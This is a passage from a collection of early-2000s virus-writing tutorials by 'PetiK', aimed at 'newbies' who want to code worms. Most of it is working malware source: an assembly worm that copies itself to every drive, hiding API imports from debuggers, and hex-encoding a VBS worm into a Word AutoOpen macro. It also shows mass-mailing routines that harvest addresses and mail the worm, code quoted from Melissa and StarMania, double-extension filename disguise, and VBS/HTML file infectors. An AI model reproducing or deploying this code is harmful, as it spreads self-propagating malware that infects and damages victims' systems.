spread_system: call @lect db "D:\",0 db "E:\",0 ...... db "Y:\",0 db "Z:\",0 @lect: pop esi push 23 pop ecx loop_lect: push ecx push esi api SetCurrentDirectoryA ; test eax,eax ; jnz continue_spread push 0 @pushsz "winbackup.exe" push offset orig_worm api CopyFileA ;continue_spread: @endsz pop ecx loop loop_lect end_spread_system:

; The differents drives. We don't ; use A,B because it's certainly ; floopy drive.

; Number of drives 26-3=23

; name of copy

-----------------------source----------------------.586p .model flat

.code JUMPS api macro a extrn a:proc call a endm include Useful.inc start_worm: push mov push push api 50 esi,offset orig_worm esi 0 GetModuleFileNameA

spread_system: call @lect db "D:\",0 db "E:\",0 db "F:\",0 db "G:\",0 db "H:\",0 db "I:\",0 db "J:\",0 db "K:\",0 db "L:\",0 db "M:\",0 db "N:\",0 db "O:\",0 db "P:\",0 db "Q:\",0 db "R:\",0 db "S:\",0 db "T:\",0 db "U:\",0 db "V:\",0 db "W:\",0 db "X:\",0 db "Y:\",0 db "Z:\",0 @lect: pop esi push 23 pop ecx loop_lect: push ecx push esi api SetCurrentDirectoryA push 0 @pushsz "winbackup.exe" push offset orig_worm api CopyFileA @endsz pop ecx loop loop_lect end_spread_system: end_worm: push 0 api ExitProcess .data orig_worm lect db 50 dup (0) db 50 dup (0)

end start_worm end -----------------------source-----------------------

########################################### #III:Extract API from KERNEL32.DLL library# ########################################### A lot of disassembler/debugger (like W32DASM) can find the APIs used by a program.

And a worm/virs/trojan is a program. With normal program : "extrn API:proc" Import functions of W32DASM show KERNEL32.CloseHandle KERNEL32.CreateFileA KERNEL32.GetModuleHandleA KERNEL32.GetProcAddress KERNEL32.WriteFile A user who debug the program can to doubt that the program Create or open a file to write something. We can hide KERNEL32.CloseHandle KERNEL32.CreateFileA and KERNEL32.WriteFile. How ?? While exctracting APIs from KERNEL32.DLL code section -----------First: Open KERNEL32.DLL: @pushsz "KERNEL32.DLL" api GetModuleHandleA xchg eax,ebx Second: kern Use a macro to take the address of APIs: macro x push offset sz&x push ebx api GetProcAddress mov _ptk&x,eax

endm Third: Extract the different APIs: kern CloseHandle kern CreateFileA kern WriteFile Fourth: call ... call ... call data section -----------szCloseHandle szCreateFileA szWriteFile _ptkCloseHandle _ptkCreateFileA _ptkWriteFile Use the APIs: _ptkCloseHandle _ptkCreateFileA _ptkWriteFile

db "CloseHandle",0 db "CreateFileA",0 db "WriteFile",0 dd ? dd ? dd ?

If we debug the program Import functions of W32DASM show KERNEL32.GetModuleHandleA KERNEL32.GetProcAddress -----------------------source----------------------.586p .model flat .code JUMPS api macro a extrn a:proc call a endm include Useful.inc start_worm: @pushsz "KERNEL32.DLL" api GetModuleHandleA xchg eax,ebx kern macro x push offset sz&x push ebx

api mov endm kern kern kern

GetProcAddress _ptk&x,eax CloseHandle CreateFileA WriteFile

prep_spread_worm: push 0 push 80h push 2 push 0 push 1 push 40000000h @pushsz "C:\KernApi.txt" call _ptkCreateFileA xchg eax,ebx push 0 push offset octets push e_txt - s_txt push offset s_txt push ebx call _ptkWriteFile push ebx call _ptkCloseHandle .data octets dd ? szCloseHandle szCreateFileA szWriteFile _ptkCloseHandle _ptkCreateFileA _ptkWriteFile s_txt: db db db db e_txt: db "CloseHandle",0 db "CreateFileA",0 db "WriteFile",0 dd ? dd ? dd ?

'Text file create with',CRLF 'APIs extract from',CRLF 'KERNEL32.DLL library',CRLF,CRLF 9,'PetiK',CRLF

end start_worm end -----------------------source----------------------############# #Conclusion:# ############# If you have some questions or suggestions, please mail me to petikvx@multmania.com.

=== VBS tutorial === === by PetiK (05/05/2002) ==== ################ # Introducion: # ################ I wrote this article after programming VBS.Xchange and VBS.Doublet (two VBS/DOC infectors). There are three parts in this article. - Hex Conversion : How convert a ascii file (VBS in a module of Word for example). - Spread with "mailto:" : spread a VBS worm with web files. - Random Name Generator : To change in each start a new copy of a VBS worm/virii. I succeeded to code without look at other source This sort of aticle is of course not for good coderz but for the newbies (NOT LAMERZ) and all people who want learn about WORM programming.

################### # HEX CONVERSION: # ################### Why convert a file in hexadecimal ?? For example to put it in module of a Word dosument. How to do this ?? 1) Set fso=CreateObject("Scripting.FileSystemObject") Set fl=fso.OpenTextFile(WScript.ScriptFullname,1) virus=fl.ReadAll fl.Close 2) For i=1 To len(virus) 3) e=Mid(virus,i,1) e=Hex(Asc(e)) 4) If Len(e)=1 Then e="0"&e End If

' Read all the file

' Take the size of the file ' Take one byte after one. ' And convert in hexa. (P=50;e=65;...) ' If the hexa < 10h we add a 0 ' Example : return (0Dh0Ah). We will have D and A. ' So we add a 0 => 0D and 0A part is for the lenght of the line in the module ' of the document (don't support too long). ' Here we put 110 character: ' e = e + "...110 char..." ' Here is for the last line if there are less 110 char : ' e = e + "... 1 < number of char < 110..."

5) f=f+e ' This If Len(f)=110 Then sp.WriteLine "e = e + """+f+"""" f="" End If 6) If Len(virus)-i = 0 Then sp.WriteLine "e = e + """+f+"""" f="" End If

So the code source : ******************************************************************************************************************* ***** On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set fl=fso.OpenTextFile(WScript.ScriptFullname,1) virus=fl.ReadAll fl.Close set sp=fso.CreateTextFile("example_vbshex.txt",True,8) sp.WriteLine "Attribute VB_Name = ""VirModule""" sp.WriteLine "Sub AutoOpen()" sp.WriteLine "On Error Resume Next" sp.WriteLine "e = """"" For i=1 To len(virus) e=Mid(virus,i,1) e=Hex(Asc(e)) If Len(e)=1 Then e="0"&e End If f=f+e If Len(f)=110 Then sp.WriteLine "e = e + """+f+"""" f="" End If If Len(virus)-i = 0 Then sp.WriteLine "e = e + """+f+"""" f="" End If

Next sp.WriteLine "read=dec(e)" sp.WriteLine "Open ""C:\newvbsfile.vbs"" For Output As #1" sp.WriteLine "Print #1, read" sp.WriteLine "Close #1" sp.WriteLine "Shell ""wscript C:\newvbsfile.vbs""" sp.WriteLine "End Sub" sp.WriteLine "" sp.WriteLine "Function dec(octe)" sp.WriteLine "For hexad = 1 To Len(octe) Step 2" sp.WriteLine "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))" sp.WriteLine "Next" sp.WriteLine "End Function" sp.Close ******************************************************************************************************************* ***** And this is the result: ******************************************************************************************************************* ***** Attribute VB_Name = "VirModule" Sub AutoOpen() On Error Resume Next e = "" e = e + "4F6E204572726F7220526573756D65204E6578740D0A5365742066736F3D4372656174654F626A6563742822536372697074696E672E46" e = e + "696C6553797374656D4F626A65637422290D0A53657420666C3D66736F2E4F70656E5465787446696C6528575363726970742E53637269" e = e + "707446756C6C6E616D652C31290D0A76697275733D666C2E52656164416C6C0D0A666C2E436C6F73650D0A0D0A7365742073703D66736F" e = e + "2E4372656174655465787446696C6528226578616D706C655F7662736865782E747874222C547275652C38290D0A73702E57726974654C" e = e + "696E6520224174747269627574652056425F4E616D65203D2022225669724D6F64756C652222220D0A73702E57726974654C696E652022" e = e + "537562204175746F4F70656E2829220D0A73702E57726974654C696E6520224F6E204572726F7220526573756D65204E657874220D0A73" e = e + "702E57726974654C696E65202265203D2022222222220D0A0D0A466F7220693D3120546F206C656E287669727573290D0A0D0A653D4D69" e = e + "642876697275732C692C31290D0A653D48657828417363286529290D0A0D0A4966204C656E2865293D31205468656E0D0A653D22302226" e = e + "650D0A456E642049660D0A0D0A663D662B650D0A4966204C656E2866293D313130205468656E0D0A73702E57726974654C696E65202265" e = e + "203D2065202B202222222B662B222222220D0A663D22220D0A456E642049660D0A0D0A4966204C656E287669727573292D69203D203020" e = e + "5468656E0D0A73702E57726974654C696E65202265203D2065202B202222222B662B222222220D0A663D22220D0A456E642049660D0A0D" e = e + "0A4E6578740D0A0D0A73702E57726974654C696E652022726561643D646563286529220D0A73702E57726974654C696E6520224F70656E" e = e + "202222433A5C6E657776627366696C652E766273222220466F72204F7574707574204173202331220D0A73702E57726974654C696E6520" e = e + "225072696E742023312C2072656164220D0A73702E57726974654C696E652022436C6F7365202331220D0A73702E57726974654C696E65" e = e + "20225368656C6C2022227773637269707420433A5C6E657776627366696C652E7662732222220D0A73702E57726974654C696E65202245" e = e + "6E6420537562220D0A73702E57726974654C696E652022220D0A73702E57726974654C696E65202246756E6374696F6E20646563286F63" e = e + "746529220D0A73702E57726974654C696E652022466F72206865786164203D203120546F204C656E286F6374652920537465702032220D" e = e + "0A73702E57726974654C696E652022646563203D20646563202620436872282222266822222026204D6964286F6374652C206865786164" e = e + "2C20322929220D0A73702E57726974654C696E6520224E657874220D0A73702E57726974654C696E652022456E642046756E6374696F6E" e = e + "220D0A73702E436C6F7365" read=dec(e) Open "C:\newvbsfile.vbs" For Output As #1 Print #1, read Close #1 Shell "wscript C:\newvbsfile.vbs" End Sub Function dec(octe) For hexad = 1 To Len(octe) Step 2 dec = dec & Chr("&h" & Mid(octe, hexad, 2)) Next End Function ******************************************************************************************************************* ***** The function "dec" allows to convert in the opposite sense.

######################### # SPREAD WITH "MAILTO:" # #########################

Now we are going to see how spread a VBS worm without the Windows AddressBook (aka WAB). If we can't use the WAB, we can read old mail and take the EMail. But too bad, I don't code this in VBS. Last solution : take the EMail in the WEB file (htm, html, asp, etc...). When we see a link to send an mail by clicking this is the code: href="mailto:petikvx@aol.com">PetiKVX</A> ------There is always this string : "MAILTO:". So! Fine! We can scan all file to search this string and scan the EMail.

1) if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then ' Take the good extension ' htm, html, asp, doc, xls set htm=fso.OpenTextFile(fil.path,1) ' and open the file. verif=True allhtm=htm.ReadAll() ' Read all the file. htm.Close 2) For ml=1 To Len(allhtm) count=0 3) If Mid(allhtm,ml,7) = "mailto:" Then counter=counter+1 mlto="" 4) Do While Mid(allhtm,ml+6+count,1) <> """" count=count+1 mlto = mlto + Mid(allhtm,ml+6+count,1) loop 5) sendmailto(left(mlto,len(mlto)-1)) ' Get the size. ' Find the mailto: string.

' Scan the EMail until the '"' string.

' Send the mail

And now, the code: ******************************************************************************************************************* ***** On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set mel=fso.CreateTextFile("spread_mailto.txt",8,TRUE) counter=0 lect() mel.WriteLine "#" mel.Close WScript.Quit Sub lect() On Error Resume Next Set dr=fso.Drives For Each d in dr If d.DriveType=2 or d.DriveType=3 Then list(d.path&"\") End If Next End Sub Sub spreadmailto(dir) On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set f=fso.GetFolder(dir) Set cf=f.Files For Each fil in cf ext=fso.GetExtensionName(fil.path) ext=lcase(ext) if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then set htm=fso.OpenTextFile(fil.path,1) allhtm=htm.ReadAll() htm.Close For ml=1 To Len(allhtm) count=0 If Mid(allhtm,ml,7) = "mailto:" Then counter=counter+1 mlto="" Do While Mid(allhtm,ml+6+count,1) <> """" count=count+1 mlto = mlto + Mid(allhtm,ml+6+count,1) loop mel.WriteLine counter &" <"&left(mlto,len(mlto)-1)&">" msgbox mlto sendmailto(left(mlto,len(mlto)-1))

End If Next End If Next End Sub Sub list(dir) On Error Resume Next Set f=fso.GetFolder(dir) Set ssf=f.SubFolders For Each fil in ssf spreadmailto(fil.path) list(fil.path) Next End Sub Sub sendmailto(email) Set out=CreateObject("Outlook.Application") Set mailmelto=out.CreateItem(0) mailmelto.To email mailmelto.Subject "Subject of worm" mailmelto.Body "Body of worm" mailmelto.Attachment.Add (WScript.ScriptFullName) mailmelto.DeleteAfterSubmit = True mailmelto.Send Set out = Nothing End Sub ******************************************************************************************************************* ***** In the spread_mailto.txt file we have this: ******************************************************************************************************************* ***** 1 <Petikvx@aol.com> 2 <VBS.Ketip.A@mm> 3 <PetiK@aol.com> 4 <kavdaemon@relay.avp.ru> 5 <kavdaemon@relay.avp.ru>kavdaemon@relay.avp.ru</A></TD></TR> <TR class=aolmailheader> <TD noWrap vAlign=top width=> 6 <Pentasm99@aol.com> 7 <Pentasm99@aol.com screenname=> ... ... ******************************************************************************************************************* ***** We can see of course some problems: - <VBS.Ketip.A@mm> : not a real EMail but a Norton Worm Name - <kavdaemon@relay.avp.ru>kavdaemon@relay.avp.ru</A></TD></TR>: <TR class=aolmailheader> : The scan doesn't found immediatly the '"' string. <TD noWrap vAlign=top width=> : - <Pentasm99@aol.com screenname=> : IDEM. It was not '"' the end of the mail but a space (20h)

########################## # RANDOM NAME GENERATOR: # ########################## Like I said in my last article about "Hide a copy a of worm" we are going to make the same thing in VBS. 1) tmpname="" 2) randomize(timer) namel=int(rnd(1)*20)+1 3) For lettre = 1 To namel randomize(timer) tmpname=tmpname & chr(int(rnd(1)*26)+97) Next 4) typext = "execombatbmpjpggifdocxlsppthtmhtthta" randomize(timer) tmpext = int(rnd(1)*11)+1 ' Value of tmpname is NULL ' Random size of the first part of name ' between 1 and 20. ' Put the letter. ' 97 : Start from "a" (65 : Start from "A") ' 26 : from "a-A" to "z-Z" ' for number 26 => 9 and 97 => 48 ' Now we choice an extension between 12 differents.

5) tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs"

' And we have the result

Code Source: ******************************************************************************************************************* *****

tmpname="" randomize(timer) namel=int(rnd(1)*20)+1 For lettre = 1 To namel randomize(timer) tmpname=tmpname & chr(int(rnd(1)*26)+97) Next typext = "execombatbmpjpggifdocxlsppthtmhtthta" randomize(timer) tmpext = int(rnd(1)*11)+1 tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs" MsgBox tmpname ******************************************************************************************************************* ***** Some Examples: mhrmhoulleyl.htm.vbs rlvqmtyppjcbho.bat.vbs PREYXUDBNYKNLRSALL.DOC.VBS 869768177527247364.gif.vbs ... ... This technics is extra to change name of worms copy ineach start (look at my last article) ############### # CONCLUSION: # ############### This is the end of the article. I hope that it help you in your creations and research. If you have any suggestions or comments, please mail me to petikvx@aol.com PetiK (www.petikvx.fr.fm)

=== Three ways of spread === === by PetiK (05/20/2002) ===

################ # Introducion: # ################ I present in this article the tree mains ways that I use to spread my worms.

############## # Read Mail: # ############## I use this first way to code a worm in C++. It is a simple syntax. For this we use MAPI function : FindNext, ReadMail, SendMail and FreeBuffer First of all "prepare" the APIs : ULONG ULONG ULONG ULONG ULONG ULONG (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL FAR FAR FAR FAR FAR FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG); *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE); *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG); *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR); *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *); *mFreeBuffer)(LPVOID);

Then "call" the APIs : hMAPI=LoadLibrary("MAPI32.DLL"); (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail"); (FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon"); (FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff"); (FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext"); (FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail"); (FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer"); And at the end the syntax to read the mail, take email and send the mail : // Initialize MAPI mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session); // Find the first mail if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) { do { // Read the mail if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) { // Here we take the "name" and the "email" of the guy who send the mail strcpy(mname,mes->lpOriginator->lpszName); strcpy(maddr,mes->lpOriginator->lpszAddress); mes->ulReserved=0; mes->lpszSubject="Subject of worm"; mes->lpszNoteText="Body of Worm."; mes->lpszMessageType=NULL; mes->lpszDateReceived=NULL; mes->lpszConversationID=NULL; mes->flFlags=MAPI_SENT; mes->lpOriginator->ulReserved=0; mes->lpOriginator->ulRecipClass=MAPI_ORIG; mes->lpOriginator->lpszName=mes->lpRecips->lpszName; mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress; mes->nRecipCount=1; mes->lpRecips->ulReserved=0; mes->lpRecips->ulRecipClass=MAPI_TO; // Here is the new email mes->lpRecips->lpszName=mname; mes->lpRecips->lpszAddress=maddr; mes->nFileCount=1; mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc)); memset(mes->lpFiles, 0, sizeof(MapiFileDesc)); mes->lpFiles->ulReserved=0;

mes->lpFiles->flFlags=NULL; mes->lpFiles->nPosition=-1; mes->lpFiles->lpszPathName="C:\WINDOWS\worm.exe"; mes->lpFiles->lpszFileName="othername.exe"; mes->lpFiles->lpFileType=NULL; mSendMail(session, NULL, mes, NULL, NULL); } // Find the next mail }while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS); free(mes->lpFiles); mFreeBuffer(mes); // Close MAPI mLogoff(session,0,0,0); FreeLibrary(hMAPI); } I you can use this function in VBS (or VB), very good (and mail me). ************************************************************************************************ ##################### # "mailto:" string: # ##################### I'm going to explain how use this way in 3 differents languages {Win32Asm} I took the code from my worm I-Worm.Gamma 1st: Open the file call inc je dec xchg 2nd: CreateFileA eax END_S eax eax,ebx

Map the File push push push call test jz PAGE_READONLY 0 ebx CreateFileMappingA eax,eax FERME1 FILE_MAP_READ ebp MapViewOfFile eax,eax FERME2 eax,esi

3rd: push push call test jz xchg

ls_s_m: call @mt db 'mailto:' @mt: pop edi l_s_m: pushad push 07h pop ecx rep cmpsb popad je s_m inc esi loop l_s_m FERME3: push esi call UnmapViewOfFile FERME2: push ebp call CloseHandle FERME1: push ebx call CloseHandle popad

; We compare 7 bytes with "mailto:" string

ret s_m: xor edx,edx add esi,7 mov edi,offset mail_address ; and we stock the email in the push edi ; mail_address offset = EDI lodsb cmp al,' ' je s_c cmp al,'"' ; If charachter = " je e_c cmp al,'''' ; or charachter = ', it is the end of the mail je e_c cmp al,'@' ; control if exists @ jne o_a inc edx stosb jmp n_c inc esi jmp n_c xor al,al stosb pop edi test edx,edx ; no @ ?? no valid email. je other_file

n_c:

o_a: s_c: e_c:

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; {C++} In C++, there is three parts. First : FindFile hFile=FindFirstFile(ext,&ffile); // if(hFile!=INVALID_HANDLE_VALUE) { while(abc) { // GetMail(ffile.cFileName,mail); if(strlen(mail)>0) { sendmail(mail); } // abc=FindNextFile(hFile,&ffile); } // } // Second : Get the EMail void GetMail(char *namefile, char *mail) { hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0); if(hf==INVALID_HANDLE_VALUE) return; // Like in Win32Asm : size=GetFileSize(hf,NULL); // Open File if(!size) return; // Empty ?? Close it size-=100; hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0); if(!hf2) { CloseHandle(hf); // Map the file return; } mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0); if(!mapped) { CloseHandle(hf2); CloseHandle(hf); return; } i=0; while(i<size && !test) { if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) { test=TRUE; i+=strlen("mailto:"); // // // NO COMMENTS ! // //

// If "mailto:" string exists ??

k=0; while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) { // Until " or ' charachter if(mapped[i]!=' ') { mail[k]=mapped[i]; k++; if(mapped[i]=='@') // Check @ charachter valid=TRUE; } i++; } mail[k]=0; // and stock email in mail offset } else i++; } if(!valid) mail[0]=0; UnmapViewOfFile(mapped); CloseHandle(hf2); CloseHandle(hf); return; } Third : Send the mail void sendmail(char *tos) { memset(&mess,0,sizeof(MapiMessage)); memset(&from,0,sizeof(MapiRecipDesc)); from.lpszName=NULL; from.ulRecipClass=MAPI_ORIG; mess.lpszSubject="Subject of mail"; mess.lpszNoteText="Body of mail"; mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc)); if(!mess.lpRecips) return; memset(mess.lpRecips,0,sizeof(MapiRecipDesc)); mess.lpRecips->lpszName=tos; // Here the mail that we found mess.lpRecips->lpszAddress=tos; mess.lpRecips->ulRecipClass=MAPI_TO; mess.nRecipCount=1; mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc)); if(!mess.lpFiles) return; memset(mess.lpFiles,0,sizeof(MapiFileDesc)); mess.lpFiles->lpszPathName="FullName_of_the_worm.exe"; mess.lpFiles->lpszFileName="othername_of_worm.exe"; mess.nFileCount=1; mess.lpOriginator=&from; mSendMail(0,0,&mess,0,0); free(mess.lpRecips); free(mess.lpFiles); } ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; {VBS} Look at my article "VBS Tutorial" ************************************************************************************************ ######################## # Outlook Address Book # ######################## {Win32Asm} // Send the mail

In the virus/worm Win32.HiV, Benny scans the default WAB file to spread. But it was a little difficult for me. Then I coded differently. To have the path of WAB file: srch_wab: mov edi,offset wab_path push offset wab_size ; = fullname of WAB file push edi push offset reg push 0 @pushsz "Software\Microsoft\Wab\WAB4\Wab File Name" ; The name of WAB file push 80000001h api SHGetValueA To open and map file, like for the HTM and HTML file (see on top). Now, scan the file: d_scan_mail: call @smtp db 'SMTP',00h,1Eh,10h,56h,3Ah ; the string what we want to find @smtp: pop edi s_scan_mail: pushad push 9 pop ecx rep cmpsb popad je scan_mail inc esi loop s_scan_mail .... scan_mail: xor add mov push p_c: cmp je cmp je cmp jne inc not_a: edx,edx esi,21 edi,offset mail_addr edi lodsb al," " car_s al,00h f_mail al,"@" not_a edx stosb jmp p_c car_s: inc esi jmp p_c f_mail: xor al,al stosb pop edi test edx,edx je d_scan_mail call send_mail jmp d_scan_mail

; EDI = EMail

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; {VBA} I took the code from W97M.Melissa.A: Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count

Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Subject of the worm" BreakUmOffASlice.Body = "Body of the Worm" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; {VBS} I took the code from VBS.StarMania: Set O=CreateObject("Outlook.Application") Set mapi=O.GetNameSpace("MAPI") For Each AL In mapi.AddressLists If AL.AddressEntries.Count <> 0 Then For AddListCount = 1 To AL.AddressEntries.Count Set ALE = AL.AddressEntries(AddListCount) Set go = O.CreateItem(0) go.To = ALE.Address go.Subject = "GUESS" go.Body = "GUESS" go.Attachments.Add(WScript.ScriptFullName) go.DeleteAfterSubmit = True go.Send ************************************************************************************************ ############### # Conclusion: # ############### This is the end of this article. If you have some questions or suggestions, please mail me to petikvx@aol.com PetiK (www.petikvx.fr.fm)

=== What language for which work ?? === === by PetiK (06/02/2002) ===

################ # Introducion: # ################ Often new coders (like newbies) ask oneself what is the best language to code virus - worms. So I try to present the different languages that I use to code my works. First I present the compile languages (Win32Asm - C/C++ - VB) and second the script language.

################ # 1) Win32asm: # THE BEST ################ It's by far the best way to code virus/worms. You can all control with this. This language is useful for a good infection. Today, 98 % of virii are coded in assembler. There are different ways to spread worms too. First the MAPI functions. Look at my works (and others) to see the syntax. Other way : SMTP. It's a good device to deceive the victims. They can believe that an email come from a company (support@microsoft.com) or himself. But it is a difficult language in the biginning. See, read and learn tutorials and other viriis/worms' source. ############# # 2) C/C++: # ############# I learnt this language 6 months ago. Advantage, the syntax is as easy as ASM. It's especially a language to code worms thanks to <mapi.h>. You can spread you work by reading old mails or scan some WEB files but also by coding a SMTP processus. This language is equally use to code worms that use IIS server to spread like the worm : W32.Nimda.Worm. With this language, you can code virii/worms' linux too. ########## # 3) VB: # ########## Of course it's a lame language. But you can use the Outlook's Address Book to spread your work without effort. But this sort of program are fast detected by AV (Norton : Bloodhound.W32.VBWORM). Personnaly, I use this language to code some tools like Virii/Worms Generator or other things. ########### # 4) VBS: # ########### Very easy. I learnt this language by reading the source of VBS.ILoveYou.Worm. You can easy make a good parasit virus and worm with Outlook's Address Book. Remark : VBS is a Micro$oft language. So you can travel throught different Micro$oft software like Outlook (of course) but also with Word. If you want to read good source coded in VBS, look at Zulu homepage. ############ # 5) HTML: # ############ With this language, the most interesting are the virii. Of course you code in

VBS language (or in JavaScript). This is the same syntax. Try to find a new sort of spreading. ########### # 6) VBA: # ########### If you know the VBS language, you don't will have problemz to code a macro virus (DOC / XLS). To code macro virii is easiest thing in the VX life. So you must find novelties (new way to infect DOC files, infect DOC/XLS files or spread throught DOC/EXE files, etc...). Spread is easy too : Melissa.A.

############### # Conclusion: # ############### This is the end of this article. If you have some questions or suggestions, please mail me to petikvx@aol.com PetiK (www.petikvx.fr.fm)

=== VBS/HTML multi-infection === === by PetiK (06/19/2002) ==== ################ # Introducion: # ################ This article present how to travel between VBS and HTML file to infect them. There are 4 chapters : I: VBS -> VBS II: VBS -> HTML III: HTML-> HTML IV: HTML-> VBS ################# # I: VBS -> VBS # ################# We can frequently see this in the VBS virus. There are two sort of infection: -Overwritting : % To bad, the user sees immediatly the problem % Crash the VBS file So this solution is not very good. -Parasit : % Start of the file : ********************** * 'mark of the virus * * * * + * * * * VBS virus * ********************** * * * Real VBS prog * * * ********************** % End of the file : ********************** * 'mark of the virus * ********************** * * * Real VBS prog * * * ********************** * * * VBS virus * * * ********************** So we're going to see the code : 'mark On Error Resume Next Set fso = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell") Set fl = fso.OpenTextFile(WScript.ScriptFullName, 1) virus = fl.ReadAll fl.Close infectfile() Sub infectfile() On Error Resume Next Set fso = CreateObject("Scripting.FileSystemObject") Set drv = fso.Drives For Each d In drv If d.DriveType = 2 Or d.DriveType = 3 Then list(d.path&"\") End If Next End Sub Sub list(doss) On Error Resume Next Set fso = CreateObject("Scripting.FileSystemObject") Set fold = fso.GetFolder(doss) Set yebjp = fold.SubFolders For Each f1 In yebjp infect(f1.Path) list(f1.Path) Next End Sub ' Stock the virus code

' Get the drive

' Get the folder

Sub infect(doss) On Error Resume Next Set zqhanx = CreateObject("Scripting.FileSystemObject") Set lxxj = zqhanx.GetFolder(doss) Set fc = lxxj.Files For Each f1 In fc ext = fso.GetExtensionName(f1.Path) ext = lCase(ext) If (ext = "vbs") Then Set cot = fso.OpenTextFile(f1.Path, 1, False) If cot.ReadLine <> "'mark" Then cot.Close Set cot = fso.OpenTextFile(f1.Path, 1, False) vbsorg = cot.ReadAll() cot.Close Set inf = fso.OpenTextFile(f1.Path, 2, True) inf.WriteLine virus inf.WriteLine "" inf.WriteLine (vbsorg) inf.Close End If End If Next End Sub ################### # II: VBS -> HTML # ###################

' Get the files

' check is already infected

' write virus code ' write real code

So, the idea is to put the viral code into the VBS file. How ?? by converting into hex string : .... .... If (ext = "htm") or (ext = "html") Then Set cot = fso.OpenTextFile(f1.Path, 1, False) If InStr(1,cot.ReadAll(),"vbshex") = 0 Then cot.Close Set htmf = fso.OpenTextFile(f1.Path, 8, False) htmf.WriteLine "<SCRIPT LANGUAGE=VBSCRIPT>" f = "vbshex=""" For i = 1 to Len(virus) e=Mid(virus,i,1) e=Hex(Asc(e)) If Len(e)=1 Then e="0"&e End If f=f+e Next f=f+"""" ...... NO FINISH, SEE THE fourth chapter htmf.WriteLine f htmf.Close End If End If Set htmf = fso.CreateTextFile("hello.htm",8,-2) htmf.WriteLine "<SCRIPT LANGUAGE=VBSCRIPT>" f = "vbshex=""" For i = 1 to Len(virus) e=Mid(virus,i,1) e=Hex(Asc(e)) If Len(e)=1 Then e="0"&e End If f=f+e Next f=f+"""" htmf.WriteLine f htmf.Close ' Here the infection HTML -> VBS

' check is already infected

' take all char ' and convert in hex 'DA -> 0D0A for VbCrLf

##################### # III: HTML -> HTML # ##################### It's a simple routine. Like in VBS (and it's in VBS). This a part of source : <mark> <html><head><title>You're title</title></head><body> <script language=VBScript> On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") If err.number=429 Then ws.Run javascript:location.reload() Else infhtm(uplobu.GetSpecialFolder(0)) infhtm(uplobu.GetSpecialFolder(1)) infhtm(unlgeu.SpecialFolders("MyDocuments")) End If Function infhtm(dir) If fso.FolderExists(dir) Then Set ibamih=fso.GetFolder(dir) Set vtob=ibamih.Files For each f1 in vtob ext=lcase(uplobu.GetExtensionName(f1.Name)) If ext="htm" or ext="html" Then Set eqybwx=fso.OpenTextFile(djra.path, 1, False) If eqybwx.ReadLine <> "<mark>" Then eqybwx.Close() Set eqybwx=fso.OpenTextFile(djra.path, 1, False) htmorg=eqybwx.ReadAll() eqybwx.Close() Set virushtm=document.body.CreateTextRange Set eqybwx=fso.CreateTextFile(djra.path, True, False) eqybwx.WriteLine "<mark>" eqybwx.Write(htmorg) eqybwx.WriteLine virushtm.htmltext eqybwx.Close() Else eqybwx.Close() End If End If Next End 